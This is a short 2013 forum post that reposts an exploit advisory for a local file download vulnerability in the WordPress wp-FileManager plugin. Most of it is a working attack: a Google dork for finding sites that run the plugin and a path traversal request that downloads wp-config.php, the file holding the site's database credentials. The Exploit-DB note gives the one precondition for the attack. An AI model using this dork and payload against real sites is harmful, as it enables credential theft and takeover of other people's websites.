Active Members akkiliON Posted May 16, 2013 Active Members Report Share Posted May 16, 2013 Title: Wordpress wp-FileManager Local File Download VulnerabilityAuthor: ByEgeDownload: http://wordpress.org/extend/plugins/wp-filemanager/Test Platform: LinuxImages: http://j1305.hizliresim.com/19/f/n0xxf.jpgVuln. Plat.: Web ApplicationGoogle Dorks: inurl:wp-content/plugins/wp-filemanager/Test : http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download# Exploit-DB Note:# In order for this to work, the "Allow Download" setting must be checked in the FileManager's settings.Wordpress wp-FileManager - Arbitrary File Download Vulnerability Quote Link to comment Share on other sites More sharing options...